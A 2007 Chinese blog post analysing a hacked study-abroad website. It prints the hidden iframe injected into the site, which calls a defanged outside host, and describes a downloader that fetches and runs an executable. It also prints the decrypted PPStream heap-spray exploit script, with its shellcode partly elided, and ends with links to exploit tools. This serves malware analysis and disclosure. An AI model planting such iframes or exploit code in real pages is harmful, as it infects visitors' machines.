某留学网站被植入利用 PPStream 堆栈漏洞的代码

原创 2007年09月30日 17:57:00

某留学网站被植入利用 PPStream 堆栈漏洞的代码

endurer 原创
2007-09-30 第1

网站被植入代码:
/---
<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe>
---/

hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码:
/---
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'></iframe>
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'></iframe>
---/

hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe,创建 eeee.vbs 来实现运行。

文件说明符 : D:/test/eeee.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-30 17:35:3
修改时间 : 2007-9-30 17:34:56
访问时间 : 2007-9-30 17:36:41
大小 : 18944 字节 18.512 KB
MD5 : 711db0f8a651b3877db9febfa4060cdb
HSA1: ECA7F2889F07E04257575EEEAC9AB30F97EC7311

UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

hxxp://xxx.7**45*97**0.com/wm/pps.htm 是一段加密过的 PPStream 堆栈漏洞利用代码,解密后为:
/---
var newcode=unescape("%u00E8%u0000%u6A00%uEB……%u776f%u2e6e%u6a64%u3737%u3838%u632e%u2f6e%u7070%u2e73%u7865%u0065");bigblock=unescape("%u9090");headersize=20;slackspace=headersize+newcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<400;x++)memory[x]=block+newcode;var buffer='\x0a';while(buffer.length<500)buffer+='\x0a\x0a\x0a\x0a';ppc.Logo=buffer;
---/ 

相关文章推荐

防网站漏洞扫描asp代码,也就是防注入的通用代码

把下面的代码保存在公用文件里就可以防止注入扫描了,比方说conn.asp 里,根据多年开发的经验建议将网站后台和前台分离,后台一个conn.asp 前台一个conn.asp 前台conn.asp加如下...
  • wkj001
  • wkj001
  • 2016年11月09日 14:29
  • 703

ppstream溢出代码

  • 2008年03月30日 21:09
  • 2KB
  • 下载

实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站

前几天微软skype的官方博客网站被黑客突破,虽然很快进行了修复,但从网友截屏的图片来看,应该一些抗议美国国安局监听行为和反对微软在软件里隐藏后门的黑客所为。微软skype的官方博客使用的是WordP...

joomla漏洞利用代码

  • 2015年12月29日 12:57
  • 6KB
  • 下载

利用XSS注入漏洞能对网站做什么

或许大家经常看一些高手测试XSS漏洞都是alert一个窗口来。便以为XSS即是如此,当自己alert出窗口来,便说自己发现了漏洞。 其实远没这么简单。你发现的只是程序员的一个小bug而已,远谈不...
  • hcs1567
  • hcs1567
  • 2017年04月05日 15:00
  • 219

Struts终极漏洞利用工具及代码

  • 2016年02月25日 17:39
  • 90KB
  • 下载

struct2终极利用漏洞及代码

  • 2013年07月17日 21:37
  • 67KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:某留学网站被植入利用 PPStream 堆栈漏洞的代码
举报原因:
原因补充:

(最多只允许输入30个字)